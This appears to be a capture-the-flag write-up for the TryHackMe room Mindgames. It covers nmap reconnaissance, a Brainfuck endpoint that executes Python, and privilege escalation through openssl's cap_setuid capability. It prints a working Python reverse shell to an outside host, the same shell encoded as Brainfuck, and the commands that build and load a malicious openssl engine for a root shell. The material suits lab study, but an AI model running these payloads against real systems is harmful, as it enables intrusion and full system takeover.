WriteUp — THM Mindgames
Just a terrible idea… No hints. Hack it. Don’t give up if you get stuck, enumerate harder
This is a writeup for TryHackMe room Mindgames.
Reconnaiscance
Let’s start with a nmap scan.
nmap -sC -sV -p- 10.10.202.234
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 12:15 EET
Nmap scan report for 10.10.202.234
Host is up (0.051s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 24:4f:06:26:0e:d3:7c:b8:18:42:40:12:7a:9e:3b:71 (RSA)
| 256 5c:2b:3c:56:fd:60:2f:f7:28:34:47:55:d6:f8:8d:c1 (ECDSA)
|_ 256 da:16:8b:14:aa:58:0e:e1:74:85:6f:af:bf:6b:8d:58 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Mindgames.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelGaining access
Let’s take a look at the website.
Nice. Look’s like there is some Brainfuck in store for us. I test the programs listed and they are processed at the server using a POST method to /api/bf.
Maybe I need to write a program? When I try to mess with the code I start to get interesting errors:
File "<string>", line 1
print("Hello,
^
SyntaxError: EOL while scanning string literalMaybe if I try with something else like https://sange.fi/esoteric/brainfuck/impl/interp/i.html
When I enter the Fibonacci program to this interpreter and run it the output is quite different from what we get from our website:
def F(n):
if n <= 1:
return 1
return F(n-1)+F(n-2)for i in range(10):
print(F(i))
Ok so it’s actually executing a Python script. Now we need to make a more useful Python program and convert it to brainfuck. What about this?
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.8.108.247",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])Now let’s find a text2brainfuck online: https://copy.sh/brainfuck/text.html and get a shell! Here is the “shellcode” in brainfuck:
+[----->+++<]>++.++++.+++.-.+++.++.[---->+<]>+++.---[->++++<]>-.----.------------.++++++++.------.[--->+<]>---.[++>---<]>--.-[--->++<]>+.++.+[->+++<]>.++++++++++++++.++.---.------------.++.[--->+<]>----..-[++>---<]>+.-[----->+<]>.++++.>++++++++++.+[--------->+<]>.+[-->+<]>+++.---[->++<]>-.----.------------.++++++++.------.[--->+<]>---.[++>---<]>.[--->++<]>-.----.------------.++++++++.------.[--->+<]>---.+[--->+<]>+.--[->+++<]>+.----.------------.++++++++.------.[--->+<]>---.[++>---<]>.--[-->+++<]>-.+++++.[->+++++<]>+.[--->+++++<]>.+++++.---------.>-[--->+<]>-.[-->+<]>++.-[--->++<]>+.----.------------.++++++++.------.[--->+<]>---.[++>---<]>.>-[--->+<]>--.----.[----->+<]>.++++++++.--[----->+++<]>.------------.+.--.-[->++++<]>+.----.++++++++++++.+[-->+<]>++.>++++++++++.+[--------->+<]>.+[++>---<]>.--[--->+<]>-.++++++++++++.-..---------.--.-[--->+<]>--.+[--->+<]>+..------.[-->+++<]>--.-.--.++++++++++.----------.+++.-.++++++++.----------.++++.++.+++.-[--->++<]>--.++++++++++.++++++++....-----------..>++++++++++.-[------->+<]>.++++.+[++>---<]>.--[--->+<]>.--[--->+<]>-.-----.[->+++++<]>++.----------.--[->+++<]>+.+[++>---<]>.+[--->+<]>+.+++.+++.-------.+++++++++.+.+[++>---<]>.+.+++.++++.-------.---------.>++++++++++.-[------->+<]>.++++.+[++>---<]>.--[--->+<]>.--[--->+<]>-.-----.[->+++++<]>++.----------.--[->+++<]>+.+[++>---<]>.+[--->+<]>+.+++.+++.-------.+++++++++.+.+[++>---<]>.+.+++.+++++.--------.---------.>++++++++++.-[------->+<]>.++++.+[++>---<]>.--[--->+<]>.--[--->+<]>-.-----.[->+++++<]>++.----------.--[->+++<]>+.+[++>---<]>.+[--->+<]>+.+++.+++.-------.+++++++++.+.+[++>---<]>.+.+++.++++++.---------.>++++++++++.-[------->+<]>+.[-->+<]>+++++.---[->++<]>-.++.+[->+++<]>.++++++++++++++.++.---.------------.++.[--->+<]>----..+[++>---<]>.--[--->+<]>-.--.+++++++++++..[--->+<]>++++.[------>+<]>-.[->++++++<]>.+++++++++++++.++[->++<]>.+++++++.+++++.++[->+++++<]>-.-[--->++<]>-.-----------.--[--->+<]>.++++++++++.----------.+++++++++++.[--->+++++++<]>.[--->+<]>-.---[->+++<]>.-[->++++++<]>+.Privesc
Start by running linpeas.sh. No easy exploits were identified, but this might be something:
openssl has cap_setuid capability? man capabilities explains what this does:
CAP_SETUID
* Make arbitrary manipulations of process UIDs (setuid(2),
setreuid(2), setresuid(2), setfsuid(2));
* forge UID when passing socket credentials via UNIX domain
sockets;
* write a user ID mapping in a user namespace (see user_name‐
spaces(7)).Now I need to figure how to get openssl do setuid(). Nothing easy on GTFOBins but there is an entry of loading a shared library:
openssl req -engine ./lib.soLet’s try to create our own engine with something else than crypto in mind. Taking advise from https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/
I craft a more sinister engine:
compile and link:
gcc -fPIC -o evilengine.o -c evilengine.c
gcc -shared -o evilengine.so -lcrypto evilengine.oCopy this to the target box and then pop a root shell:
openssl engine -t -c `pwd`/evilengine.soBOOM!